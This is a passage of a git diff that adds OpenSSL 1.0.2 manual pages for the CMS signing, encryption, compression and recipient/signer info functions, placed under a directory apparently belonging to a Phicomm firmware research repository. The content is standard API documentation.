+and serial number. If B<CMS_USE_KEYID> is set it will use the subject key
+identifier value instead. An error occurs if all recipient certificates do not
+have a subject key identifier extension.
+
+Currently only AES based key wrapping algorithms are supported for B<nid>,
+specifically: NID_id_aes128_wrap, NID_id_aes192_wrap and NID_id_aes256_wrap.
+If B<nid> is set to B<NID_undef> then an AES wrap algorithm will be used
+consistent with B<keylen>.
+
+=head1 RETURN VALUES
+
+CMS_add1_recipient_cert() and CMS_add0_recipient_key() return an internal
+pointer to the CMS_RecipientInfo structure just added or NULL if an error
+occurs.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<CMS_decrypt(3)|CMS_decrypt(3)>,
+L<CMS_final(3)|CMS_final(3)>,
+
+=head1 HISTORY
+
+CMS_add1_recipient_cert() and CMS_add0_recipient_key() were added to OpenSSL
+0.9.8
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_add1_signer.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_add1_signer.pod
new file mode 100644
index 0000000..a055b82
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_add1_signer.pod
@@ -0,0 +1,101 @@
+=pod
+
+=head1 NAME
+
+ CMS_add1_signer, CMS_SignerInfo_sign - add a signer to a CMS_ContentInfo signed data structure.
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ CMS_SignerInfo *CMS_add1_signer(CMS_ContentInfo *cms, X509 *signcert, EVP_PKEY *pkey, const EVP_MD *md, unsigned int flags);
+
+ int CMS_SignerInfo_sign(CMS_SignerInfo *si);
+
+
+=head1 DESCRIPTION
+
+CMS_add1_signer() adds a signer with certificate B<signcert> and private
+key B<pkey> using message digest B<md> to CMS_ContentInfo SignedData
+structure B<cms>.
+
+The CMS_ContentInfo structure should be obtained from an initial call to
+CMS_sign() with the flag B<CMS_PARTIAL> set or in the case or re-signing a
+valid CMS_ContentInfo SignedData structure.
+
+If the B<md> parameter is B<NULL> then the default digest for the public
+key algorithm will be used.
+
+Unless the B<CMS_REUSE_DIGEST> flag is set the returned CMS_ContentInfo
+structure is not complete and must be finalized either by streaming (if
+applicable) or a call to CMS_final().
+
+The CMS_SignerInfo_sign() function will explicitly sign a CMS_SignerInfo
+structure, its main use is when B<CMS_REUSE_DIGEST> and B<CMS_PARTIAL> flags
+are both set.
+
+=head1 NOTES
+
+The main purpose of CMS_add1_signer() is to provide finer control
+over a CMS signed data structure where the simpler CMS_sign() function defaults
+are not appropriate. For example if multiple signers or non default digest
+algorithms are needed. New attributes can also be added using the returned
+CMS_SignerInfo structure and the CMS attribute utility functions or the
+CMS signed receipt request functions.
+
+Any of the following flags (ored together) can be passed in the B<flags>
+parameter.
+
+If B<CMS_REUSE_DIGEST> is set then an attempt is made to copy the content
+digest value from the CMS_ContentInfo structure: to add a signer to an existing
+structure.  An error occurs if a matching digest value cannot be found to copy.
+The returned CMS_ContentInfo structure will be valid and finalized when this
+flag is set.
+
+If B<CMS_PARTIAL> is set in addition to B<CMS_REUSE_DIGEST> then the 
+CMS_SignerInfo structure will not be finalized so additional attributes
+can be added. In this case an explicit call to CMS_SignerInfo_sign() is
+needed to finalize it.
+
+If B<CMS_NOCERTS> is set the signer's certificate will not be included in the
+CMS_ContentInfo structure, the signer's certificate must still be supplied in
+the B<signcert> parameter though. This can reduce the size of the signature if
+the signers certificate can be obtained by other means: for example a
+previously signed message.
+
+The SignedData structure includes several CMS signedAttributes including the
+signing time, the CMS content type and the supported list of ciphers in an
+SMIMECapabilities attribute. If B<CMS_NOATTR> is set then no signedAttributes
+will be used. If B<CMS_NOSMIMECAP> is set then just the SMIMECapabilities are
+omitted.
+
+OpenSSL will by default identify signing certificates using issuer name
+and serial number. If B<CMS_USE_KEYID> is set it will use the subject key
+identifier value instead. An error occurs if the signing certificate does not
+have a subject key identifier extension.
+
+If present the SMIMECapabilities attribute indicates support for the following
+algorithms in preference order: 256 bit AES, Gost R3411-94, Gost 28147-89, 192
+bit AES, 128 bit AES, triple DES, 128 bit RC2, 64 bit RC2, DES and 40 bit RC2.
+If any of these algorithms is not available then it will not be included: for example the GOST algorithms will not be included if the GOST ENGINE is
+not loaded.
+
+CMS_add1_signer() returns an internal pointer to the CMS_SignerInfo
+structure just added, this can be used to set additional attributes 
+before it is finalized.
+
+=head1 RETURN VALUES
+
+CMS_add1_signer() returns an internal pointer to the CMS_SignerInfo
+structure just added or NULL if an error occurs.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<CMS_sign(3)|CMS_sign(3)>,
+L<CMS_final(3)|CMS_final(3)>,
+
+=head1 HISTORY
+
+CMS_add1_signer() was added to OpenSSL 0.9.8
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_compress.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_compress.pod
new file mode 100644
index 0000000..0a07152
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_compress.pod
@@ -0,0 +1,73 @@
+=pod
+
+=head1 NAME
+
+CMS_compress - create a CMS CompressedData structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ CMS_ContentInfo *CMS_compress(BIO *in, int comp_nid, unsigned int flags);
+
+=head1 DESCRIPTION
+
+CMS_compress() creates and returns a CMS CompressedData structure. B<comp_nid>
+is the compression algorithm to use or B<NID_undef> to use the default
+algorithm (zlib compression). B<in> is the content to be compressed.
+B<flags> is an optional set of flags.
+
+=head1 NOTES
+
+The only currently supported compression algorithm is zlib using the NID
+NID_zlib_compression.
+
+If zlib support is not compiled into OpenSSL then CMS_compress() will return
+an error.
+
+If the B<CMS_TEXT> flag is set MIME headers for type B<text/plain> are
+prepended to the data.
+
+Normally the supplied content is translated into MIME canonical format (as
+required by the S/MIME specifications) if B<CMS_BINARY> is set no translation
+occurs. This option should be used if the supplied data is in binary format
+otherwise the translation will corrupt it. If B<CMS_BINARY> is set then
+B<CMS_TEXT> is ignored.
+
+If the B<CMS_STREAM> flag is set a partial B<CMS_ContentInfo> structure is
+returned suitable for streaming I/O: no data is read from the BIO B<in>.
+
+The compressed data is included in the CMS_ContentInfo structure, unless
+B<CMS_DETACHED> is set in which case it is omitted. This is rarely used in
+practice and is not supported by SMIME_write_CMS().
+
+=head1 NOTES
+
+If the flag B<CMS_STREAM> is set the returned B<CMS_ContentInfo> structure is
+B<not> complete and outputting its contents via a function that does not
+properly finalize the B<CMS_ContentInfo> structure will give unpredictable
+results.
+
+Several functions including SMIME_write_CMS(), i2d_CMS_bio_stream(),
+PEM_write_bio_CMS_stream() finalize the structure. Alternatively finalization
+can be performed by obtaining the streaming ASN1 B<BIO> directly using
+BIO_new_CMS().
+
+Additional compression parameters such as the zlib compression level cannot
+currently be set.
+
+=head1 RETURN VALUES
+
+CMS_compress() returns either a CMS_ContentInfo structure or NULL if an error
+occurred. The error can be obtained from ERR_get_error(3).
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<CMS_uncompress(3)|CMS_uncompress(3)>
+
+=head1 HISTORY
+
+CMS_compress() was added to OpenSSL 0.9.8
+The B<CMS_STREAM> flag was first supported in OpenSSL 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_decrypt.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_decrypt.pod
new file mode 100644
index 0000000..3fa9212
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_decrypt.pod
@@ -0,0 +1,79 @@
+=pod
+
+=head1 NAME
+
+ CMS_decrypt - decrypt content from a CMS envelopedData structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ int CMS_decrypt(CMS_ContentInfo *cms, EVP_PKEY *pkey, X509 *cert, BIO *dcont, BIO *out, unsigned int flags);
+
+=head1 DESCRIPTION
+
+CMS_decrypt() extracts and decrypts the content from a CMS EnvelopedData
+structure. B<pkey> is the private key of the recipient, B<cert> is the
+recipient's certificate, B<out> is a BIO to write the content to and
+B<flags> is an optional set of flags.
+
+The B<dcont> parameter is used in the rare case where the encrypted content
+is detached. It will normally be set to NULL.
+
+=head1 NOTES
+
+OpenSSL_add_all_algorithms() (or equivalent) should be called before using this
+function or errors about unknown algorithms will occur.
+
+Although the recipients certificate is not needed to decrypt the data it is
+needed to locate the appropriate (of possible several) recipients in the CMS
+structure.
+
+If B<cert> is set to NULL all possible recipients are tried. This case however
+is problematic. To thwart the MMA attack (Bleichenbacher's attack on
+PKCS #1 v1.5 RSA padding) all recipients are tried whether they succeed or
+not. If no recipient succeeds then a random symmetric key is used to decrypt
+the content: this will typically output garbage and may (but is not guaranteed
+to) ultimately return a padding error only. If CMS_decrypt() just returned an
+error when all recipient encrypted keys failed to decrypt an attacker could
+use this in a timing attack. If the special flag B<CMS_DEBUG_DECRYPT> is set
+then the above behaviour is modified and an error B<is> returned if no
+recipient encrypted key can be decrypted B<without> generating a random
+content encryption key. Applications should use this flag with
+B<extreme caution> especially in automated gateways as it can leave them
+open to attack.
+
+It is possible to determine the correct recipient key by other means (for
+example looking them up in a database) and setting them in the CMS structure
+in advance using the CMS utility functions such as CMS_set1_pkey(). In this
+case both B<cert> and B<pkey> should be set to NULL.
+
+To process KEKRecipientInfo types CMS_set1_key() or CMS_RecipientInfo_set0_key()
+and CMS_ReceipientInfo_decrypt() should be called before CMS_decrypt() and
+B<cert> and B<pkey> set to NULL.
+
+The following flags can be passed in the B<flags> parameter.
+
+If the B<CMS_TEXT> flag is set MIME headers for type B<text/plain> are deleted
+from the content. If the content is not of type B<text/plain> then an error is
+returned.
+
+=head1 RETURN VALUES
+
+CMS_decrypt() returns either 1 for success or 0 for failure.
+The error can be obtained from ERR_get_error(3)
+
+=head1 BUGS
+
+The lack of single pass processing and the need to hold all data in memory as
+mentioned in CMS_verify() also applies to CMS_decrypt().
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<CMS_encrypt(3)|CMS_encrypt(3)>
+
+=head1 HISTORY
+
+CMS_decrypt() was added to OpenSSL 0.9.8
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_encrypt.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_encrypt.pod
new file mode 100644
index 0000000..1ee5b27
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_encrypt.pod
@@ -0,0 +1,96 @@
+=pod
+
+=head1 NAME
+
+ CMS_encrypt - create a CMS envelopedData structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ CMS_ContentInfo *CMS_encrypt(STACK_OF(X509) *certs, BIO *in, const EVP_CIPHER *cipher, unsigned int flags);
+
+=head1 DESCRIPTION
+
+CMS_encrypt() creates and returns a CMS EnvelopedData structure. B<certs>
+is a list of recipient certificates. B<in> is the content to be encrypted.
+B<cipher> is the symmetric cipher to use. B<flags> is an optional set of flags.
+
+=head1 NOTES
+
+Only certificates carrying RSA keys are supported so the recipient certificates
+supplied to this function must all contain RSA public keys, though they do not
+have to be signed using the RSA algorithm.
+
+EVP_des_ede3_cbc() (triple DES) is the algorithm of choice for S/MIME use
+because most clients will support it.
+
+The algorithm passed in the B<cipher> parameter must support ASN1 encoding of
+its parameters. 
+
+Many browsers implement a "sign and encrypt" option which is simply an S/MIME
+envelopedData containing an S/MIME signed message. This can be readily produced
+by storing the S/MIME signed message in a memory BIO and passing it to
+CMS_encrypt().
+
+The following flags can be passed in the B<flags> parameter.
+
+If the B<CMS_TEXT> flag is set MIME headers for type B<text/plain> are
+prepended to the data.
+
+Normally the supplied content is translated into MIME canonical format (as
+required by the S/MIME specifications) if B<CMS_BINARY> is set no translation
+occurs. This option should be used if the supplied data is in binary format
+otherwise the translation will corrupt it. If B<CMS_BINARY> is set then
+B<CMS_TEXT> is ignored.
+
+OpenSSL will by default identify recipient certificates using issuer name
+and serial number. If B<CMS_USE_KEYID> is set it will use the subject key
+identifier value instead. An error occurs if all recipient certificates do not
+have a subject key identifier extension.
+
+If the B<CMS_STREAM> flag is set a partial B<CMS_ContentInfo> structure is
+returned suitable for streaming I/O: no data is read from the BIO B<in>.
+
+If the B<CMS_PARTIAL> flag is set a partial B<CMS_ContentInfo> structure is
+returned to which additional recipients and attributes can be added before
+finalization.
+
+The data being encrypted is included in the CMS_ContentInfo structure, unless
+B<CMS_DETACHED> is set in which case it is omitted. This is rarely used in
+practice and is not supported by SMIME_write_CMS().
+
+=head1 NOTES
+
+If the flag B<CMS_STREAM> is set the returned B<CMS_ContentInfo> structure is
+B<not> complete and outputting its contents via a function that does not
+properly finalize the B<CMS_ContentInfo> structure will give unpredictable
+results.
+
+Several functions including SMIME_write_CMS(), i2d_CMS_bio_stream(),
+PEM_write_bio_CMS_stream() finalize the structure. Alternatively finalization
+can be performed by obtaining the streaming ASN1 B<BIO> directly using
+BIO_new_CMS().
+
+The recipients specified in B<certs> use a CMS KeyTransRecipientInfo info
+structure. KEKRecipientInfo is also supported using the flag B<CMS_PARTIAL>
+and CMS_add0_recipient_key().
+
+The parameter B<certs> may be NULL if B<CMS_PARTIAL> is set and recipients
+added later using CMS_add1_recipient_cert() or CMS_add0_recipient_key().
+
+=head1 RETURN VALUES
+
+CMS_encrypt() returns either a CMS_ContentInfo structure or NULL if an error
+occurred. The error can be obtained from ERR_get_error(3).
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<CMS_decrypt(3)|CMS_decrypt(3)>
+
+=head1 HISTORY
+
+CMS_decrypt() was added to OpenSSL 0.9.8
+The B<CMS_STREAM> flag was first supported in OpenSSL 1.0.0.
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_final.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_final.pod
new file mode 100644
index 0000000..36cf96b
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_final.pod
@@ -0,0 +1,41 @@
+=pod
+
+=head1 NAME
+
+ CMS_final - finalise a CMS_ContentInfo structure
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ int CMS_final(CMS_ContentInfo *cms, BIO *data, BIO *dcont, unsigned int flags);
+
+=head1 DESCRIPTION
+
+CMS_final() finalises the structure B<cms>. It's purpose is to perform any
+operations necessary on B<cms> (digest computation for example) and set the
+appropriate fields. The parameter B<data> contains the content to be 
+processed. The B<dcont> parameter contains a BIO to write content to after
+processing: this is only used with detached data and will usually be set to
+NULL.
+
+=head1 NOTES
+
+This function will normally be called when the B<CMS_PARTIAL> flag is used. It
+should only be used when streaming is not performed because the streaming
+I/O functions perform finalisation operations internally.
+
+=head1 RETURN VALUES
+
+CMS_final() returns 1 for success or 0 for failure.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<CMS_sign(3)|CMS_sign(3)>,
+L<CMS_encrypt(3)|CMS_encrypt(3)>
+
+=head1 HISTORY
+
+CMS_final() was added to OpenSSL 0.9.8
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_get0_RecipientInfos.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_get0_RecipientInfos.pod
new file mode 100644
index 0000000..fe49772
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_get0_RecipientInfos.pod
@@ -0,0 +1,120 @@
+=pod
+
+=head1 NAME
+
+CMS_get0_RecipientInfos, CMS_RecipientInfo_type, CMS_RecipientInfo_ktri_get0_signer_id,CMS_RecipientInfo_ktri_cert_cmp, CMS_RecipientInfo_set0_pkey, CMS_RecipientInfo_kekri_get0_id, CMS_RecipientInfo_kekri_id_cmp, CMS_RecipientInfo_set0_key, CMS_RecipientInfo_decrypt, CMS_RecipientInfo_encrypt - CMS envelopedData RecipientInfo routines
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ STACK_OF(CMS_RecipientInfo) *CMS_get0_RecipientInfos(CMS_ContentInfo *cms);
+ int CMS_RecipientInfo_type(CMS_RecipientInfo *ri);
+
+ int CMS_RecipientInfo_ktri_get0_signer_id(CMS_RecipientInfo *ri, ASN1_OCTET_STRING **keyid, X509_NAME **issuer, ASN1_INTEGER **sno);
+ int CMS_RecipientInfo_ktri_cert_cmp(CMS_RecipientInfo *ri, X509 *cert);
+ int CMS_RecipientInfo_set0_pkey(CMS_RecipientInfo *ri, EVP_PKEY *pkey);
+
+ int CMS_RecipientInfo_kekri_get0_id(CMS_RecipientInfo *ri, X509_ALGOR **palg, ASN1_OCTET_STRING **pid, ASN1_GENERALIZEDTIME **pdate, ASN1_OBJECT **potherid, ASN1_TYPE **pothertype);
+ int CMS_RecipientInfo_kekri_id_cmp(CMS_RecipientInfo *ri, const unsigned char *id, size_t idlen);
+ int CMS_RecipientInfo_set0_key(CMS_RecipientInfo *ri, unsigned char *key, size_t keylen);
+
+ int CMS_RecipientInfo_decrypt(CMS_ContentInfo *cms, CMS_RecipientInfo *ri);
+ int CMS_RecipientInfo_encrypt(CMS_ContentInfo *cms, CMS_RecipientInfo *ri);
+
+=head1 DESCRIPTION
+
+The function CMS_get0_RecipientInfos() returns all the CMS_RecipientInfo
+structures associated with a CMS EnvelopedData structure.
+
+CMS_RecipientInfo_type() returns the type of CMS_RecipientInfo structure B<ri>.
+It will currently return CMS_RECIPINFO_TRANS, CMS_RECIPINFO_AGREE,
+CMS_RECIPINFO_KEK, CMS_RECIPINFO_PASS, or CMS_RECIPINFO_OTHER.
+
+CMS_RecipientInfo_ktri_get0_signer_id() retrieves the certificate recipient
+identifier associated with a specific CMS_RecipientInfo structure B<ri>, which
+must be of type CMS_RECIPINFO_TRANS. Either the keyidentifier will be set in
+B<keyid> or B<both> issuer name and serial number in B<issuer> and B<sno>. 
+
+CMS_RecipientInfo_ktri_cert_cmp() compares the certificate B<cert> against the
+CMS_RecipientInfo structure B<ri>, which must be of type CMS_RECIPINFO_TRANS.
+It returns zero if the comparison is successful and non zero if not.
+
+CMS_RecipientInfo_set0_pkey() associates the private key B<pkey> with
+the CMS_RecipientInfo structure B<ri>, which must be of type
+CMS_RECIPINFO_TRANS.
+
+CMS_RecipientInfo_kekri_get0_id() retrieves the key information from the
+CMS_RecipientInfo structure B<ri> which must be of type CMS_RECIPINFO_KEK.  Any
+of the remaining parameters can be NULL if the application is not interested in
+the value of a field. Where a field is optional and absent NULL will be written
+to the corresponding parameter. The keyEncryptionAlgorithm field is written to
+B<palg>, the B<keyIdentifier> field is written to B<pid>, the B<date> field if
+present is written to B<pdate>, if the B<other> field is present the components
+B<keyAttrId> and B<keyAttr> are written to parameters B<potherid> and
+B<pothertype>.
+
+CMS_RecipientInfo_kekri_id_cmp() compares the ID in the B<id> and B<idlen>
+parameters against the B<keyIdentifier> CMS_RecipientInfo structure B<ri>,
+which must be of type CMS_RECIPINFO_KEK.  It returns zero if the comparison is
+successful and non zero if not.
+
+CMS_RecipientInfo_set0_key() associates the symmetric key B<key> of length
+B<keylen> with the CMS_RecipientInfo structure B<ri>, which must be of type
+CMS_RECIPINFO_KEK.
+
+CMS_RecipientInfo_decrypt() attempts to decrypt CMS_RecipientInfo structure
+B<ri> in structure B<cms>. A key must have been associated with the structure
+first.
+
+CMS_RecipientInfo_encrypt() attempts to encrypt CMS_RecipientInfo structure
+B<ri> in structure B<cms>. A key must have been associated with the structure
+first and the content encryption key must be available: for example by a
+previous call to CMS_RecipientInfo_decrypt().
+
+=head1 NOTES
+
+The main purpose of these functions is to enable an application to lookup
+recipient keys using any appropriate technique when the simpler method
+of CMS_decrypt() is not appropriate.
+
+In typical usage and application will retrieve all CMS_RecipientInfo structures
+using CMS_get0_RecipientInfos() and check the type of each using
+CMS_RecpientInfo_type(). Depending on the type the CMS_RecipientInfo structure
+can be ignored or its key identifier data retrieved using an appropriate
+function. Then if the corresponding secret or private key can be obtained by
+any appropriate means it can then associated with the structure and
+CMS_RecpientInfo_decrypt() called. If successful CMS_decrypt() can be called
+with a NULL key to decrypt the enveloped content.
+
+The CMS_RecipientInfo_encrypt() can be used to add a new recipient to an
+existing enveloped data structure. Typically an application will first decrypt
+an appropriate CMS_RecipientInfo structure to make the content encrypt key
+available, it will then add a new recipient using a function such as
+CMS_add1_recipient_cert() and finally encrypt the content encryption key
+using CMS_RecipientInfo_encrypt().
+
+=head1 RETURN VALUES
+
+CMS_get0_RecipientInfos() returns all CMS_RecipientInfo structures, or NULL if
+an error occurs.
+
+CMS_RecipientInfo_ktri_get0_signer_id(), CMS_RecipientInfo_set0_pkey(),
+CMS_RecipientInfo_kekri_get0_id(), CMS_RecipientInfo_set0_key() and
+CMS_RecipientInfo_decrypt() return 1 for success or 0 if an error occurs.
+CMS_RecipientInfo_encrypt() return 1 for success or 0 if an error occurs.
+
+CMS_RecipientInfo_ktri_cert_cmp() and CMS_RecipientInfo_kekri_cmp() return 0
+for a successful comparison and non zero otherwise.
+
+Any error can be obtained from L<ERR_get_error(3)|ERR_get_error(3)>.
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<CMS_decrypt(3)|CMS_decrypt(3)>
+
+=head1 HISTORY
+
+These functions were first was added to OpenSSL 0.9.8
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_get0_SignerInfos.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_get0_SignerInfos.pod
new file mode 100644
index 0000000..b46c0e0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_get0_SignerInfos.pod
@@ -0,0 +1,81 @@
+=pod
+
+=head1 NAME
+
+CMS_get0_SignerInfos, CMS_SignerInfo_get0_signer_id, CMS_SignerInfo_get0_signature, CMS_SignerInfo_cert_cmp, CMS_set1_signer_cert - CMS signedData signer functions.
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ STACK_OF(CMS_SignerInfo) *CMS_get0_SignerInfos(CMS_ContentInfo *cms);
+
+ int CMS_SignerInfo_get0_signer_id(CMS_SignerInfo *si, ASN1_OCTET_STRING **keyid, X509_NAME **issuer, ASN1_INTEGER **sno);
+ ASN1_OCTET_STRING *CMS_SignerInfo_get0_signature(CMS_SignerInfo *si);
+ int CMS_SignerInfo_cert_cmp(CMS_SignerInfo *si, X509 *cert);
+ void CMS_SignerInfo_set1_signer_cert(CMS_SignerInfo *si, X509 *signer);
+
+=head1 DESCRIPTION
+
+The function CMS_get0_SignerInfos() returns all the CMS_SignerInfo structures
+associated with a CMS signedData structure.
+
+CMS_SignerInfo_get0_signer_id() retrieves the certificate signer identifier
+associated with a specific CMS_SignerInfo structure B<si>. Either the
+keyidentifier will be set in B<keyid> or B<both> issuer name and serial number
+in B<issuer> and B<sno>.
+
+CMS_SignerInfo_get0_signature() retrieves the signature associated with 
+B<si> in a pointer to an ASN1_OCTET_STRING structure. This pointer returned
+corresponds to the internal signature value if B<si> so it may be read or
+modified.
+
+CMS_SignerInfo_cert_cmp() compares the certificate B<cert> against the signer
+identifier B<si>. It returns zero if the comparison is successful and non zero
+if not.
+
+CMS_SignerInfo_set1_signer_cert() sets the signers certificate of B<si> to
+B<signer>.
+
+=head1 NOTES
+
+The main purpose of these functions is to enable an application to lookup
+signers certificates using any appropriate technique when the simpler method
+of CMS_verify() is not appropriate.
+
+In typical usage and application will retrieve all CMS_SignerInfo structures
+using CMS_get0_SignerInfo() and retrieve the identifier information using
+CMS. It will then obtain the signer certificate by some unspecified means
+(or return and error if it cannot be found) and set it using
+CMS_SignerInfo_set1_signer_cert().
+
+Once all signer certificates have been set CMS_verify() can be used.
+
+Although CMS_get0_SignerInfos() can return NULL is an error occur B<or> if
+there are no signers this is not a problem in practice because the only
+error which can occur is if the B<cms> structure is not of type signedData
+due to application error.
+
+=head1 RETURN VALUES
+
+CMS_get0_SignerInfos() returns all CMS_SignerInfo structures, or NULL there
+are no signers or an error occurs.
+
+CMS_SignerInfo_get0_signer_id() returns 1 for success and 0 for failure.
+
+CMS_SignerInfo_cert_cmp() returns 0 for a successful comparison and non
+zero otherwise.
+
+CMS_SignerInfo_set1_signer_cert() does not return a value.
+
+Any error can be obtained from L<ERR_get_error(3)|ERR_get_error(3)>
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>, L<CMS_verify(3)|CMS_verify(3)>
+
+=head1 HISTORY
+
+These functions were first was added to OpenSSL 0.9.8
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_get0_type.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_get0_type.pod
new file mode 100644
index 0000000..8ff1c31
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_get0_type.pod
@@ -0,0 +1,63 @@
+=pod
+
+=head1 NAME
+
+ CMS_get0_type, CMS_set1_eContentType, CMS_get0_eContentType - get and set CMS content types
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ const ASN1_OBJECT *CMS_get0_type(CMS_ContentInfo *cms);
+ int CMS_set1_eContentType(CMS_ContentInfo *cms, const ASN1_OBJECT *oid);
+ const ASN1_OBJECT *CMS_get0_eContentType(CMS_ContentInfo *cms);
+
+=head1 DESCRIPTION
+
+CMS_get0_type() returns the content type of a CMS_ContentInfo structure as
+and ASN1_OBJECT pointer. An application can then decide how to process the
+CMS_ContentInfo structure based on this value.
+
+CMS_set1_eContentType() sets the embedded content type of a CMS_ContentInfo
+structure. It should be called with CMS functions with the B<CMS_PARTIAL>
+flag and B<before> the structure is finalised, otherwise the results are
+undefined.
+
+ASN1_OBJECT *CMS_get0_eContentType() returns a pointer to the embedded
+content type.
+
+=head1 NOTES
+
+As the B<0> implies CMS_get0_type() and CMS_get0_eContentType() return internal
+pointers which should B<not> be freed up. CMS_set1_eContentType() copies the
+supplied OID and it B<should> be freed up after use.
+
+The B<ASN1_OBJECT> values returned can be converted to an integer B<NID> value
+using OBJ_obj2nid(). For the currently supported content types the following
+values are returned:
+
+ NID_pkcs7_data
+ NID_pkcs7_signed
+ NID_pkcs7_digest
+ NID_id_smime_ct_compressedData:
+ NID_pkcs7_encrypted
+ NID_pkcs7_enveloped
+
+
+=head1 RETURN VALUES
+
+CMS_get0_type() and CMS_get0_eContentType() return and ASN1_OBJECT structure.
+
+CMS_set1_eContentType() returns 1 for success or 0 if an error occurred.  The
+error can be obtained from ERR_get_error(3).
+
+=head1 SEE ALSO
+
+L<ERR_get_error(3)|ERR_get_error(3)>
+
+=head1 HISTORY
+
+CMS_get0_type(), CMS_set1_eContentType() and CMS_get0_eContentType() were all
+first added to OpenSSL 0.9.8
+
+=cut
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_get1_ReceiptRequest.pod b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_get1_ReceiptRequest.pod
new file mode 100644
index 0000000..f546376
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/doc/crypto/CMS_get1_ReceiptRequest.pod
@@ -0,0 +1,69 @@
+=pod
+
+=head1 NAME
+
+ CMS_ReceiptRequest_create0, CMS_add1_ReceiptRequest, CMS_get1_ReceiptRequest, CMS_ReceiptRequest_get0_values - CMS signed receipt request functions.
+
+=head1 SYNOPSIS
+
+ #include <openssl/cms.h>
+
+ CMS_ReceiptRequest *CMS_ReceiptRequest_create0(unsigned char *id, int idlen, int allorfirst, STACK_OF(GENERAL_NAMES) *receiptList, STACK_OF(GENERAL_NAMES) *receiptsTo);
+ int CMS_add1_ReceiptRequest(CMS_SignerInfo *si, CMS_ReceiptRequest *rr);
+ int CMS_get1_ReceiptRequest(CMS_SignerInfo *si, CMS_ReceiptRequest **prr);
+ void CMS_ReceiptRequest_get0_values(CMS_ReceiptRequest *rr, ASN1_STRING **pcid, int *pallorfirst, STACK_OF(GENERAL_NAMES) **plist, STACK_OF(GENERAL_NAMES) **prto);
+
+=head1 DESCRIPTION
+
+CMS_ReceiptRequest_create0() creates a signed receipt request structure. The
+B<signedContentIdentifier> field is set using B<id> and B<idlen>, or it is set
+to 32 bytes of pseudo random data if B<id> is NULL. If B<receiptList> is NULL
+the allOrFirstTier option in B<receiptsFrom> is used and set to the value of
+the B<allorfirst> parameter. If B<receiptList> is not NULL the B<receiptList>
+option in B<receiptsFrom> is used. The B<receiptsTo> parameter specifies the
+B<receiptsTo> field value.
+
+The CMS_add1_ReceiptRequest() function adds a signed receipt request B<rr>
+to SignerInfo structure B<si>.
+
+int CMS_get1_ReceiptRequest() looks for a signed receipt request in B<si>, if
+any is found it is decoded and written to B<prr>.
+
+CMS_ReceiptRequest_get0_values() retrieves the values of a receipt request.
+The signedContentIdentifier is copied to B<pcid>. If the B<allOrFirstTier>
